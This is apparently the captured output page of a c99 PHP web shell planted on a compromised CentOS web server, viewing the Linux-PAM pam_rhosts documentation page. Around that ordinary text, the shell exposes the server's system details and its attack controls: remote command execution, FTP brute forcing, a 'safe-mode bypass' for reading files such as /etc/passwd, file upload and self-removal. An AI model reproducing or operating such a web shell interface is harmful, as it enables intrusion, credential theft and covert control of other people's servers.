!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/pam-0.99.6.2/html/   drwxr-xr-x
Free 51.95 GB of 127.8 GB (40.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     sag-pam_rhosts.html (6.23 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
6.23. pam_rhosts - grant access using .rhosts file
6.23. pam_rhosts - grant access using .rhosts file
Prev Chapter 6. A reference guide for available modules Next

6.23. pam_rhosts - grant access using .rhosts file

pam_rhosts.so

6.23.1. DESCRIPTION

This module performs the standard network authentication for services, as used by traditional implementations of rlogin and rsh etc.

The authentication mechanism of this module is based on the contents of two files; /etc/hosts.equiv (or and ~/.rhosts. Firstly, hosts listed in the former file are treated as equivalent to the localhost. Secondly, entries in the user's own copy of the latter file is used to map "remote-host remote-user" pairs to that user's account on the current host. Access is granted to the user if their host is present in /etc/hosts.equiv and their remote account is identical to their local one, or if their remote account has an entry in their personal configuration file.

The module authenticates a remote user (internally specified by the item PAM_RUSER connecting from the remote host (internally specified by the item PAM_RHOST). Accordingly, for applications to be compatible this authentication module they must set these items prior to calling pam_authenticate(). The module is not capable of independently probing the network connection for such information.

6.23.2. OPTIONS

debug

Print debug information.

silent

Don't print informative messages.

superuser=account

Handle account as root.

6.23.3. MODULE SERVICES PROVIDED

Only the auth service is supported.

6.23.4. RETURN VALUES

PAM_AUTH_ERR

The remote host, remote user name or the local user name couldn't be determined or access was denied by .rhosts file.

PAM_USER_UNKNOWN

User is not known to system.

6.23.5. EXAMPLES

To grant a remote user access by /etc/hosts.equiv or .rhosts for rsh add the following lines to /etc/pam.d/rsh: 

#%PAM-1.0
#
auth     required       pam_rhosts.so
auth     required       pam_nologin.so
auth     required       pam_env.so
auth     required       pam_unix.so

6.23.6. AUTHOR

pam_rhosts was written by Thorsten Kukuk <kukuk@thkukuk.de>

Prev Up Next
6.22. pam_permit - the promiscuous module Home 6.24. pam_rootok - gain only root access

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0153 ]--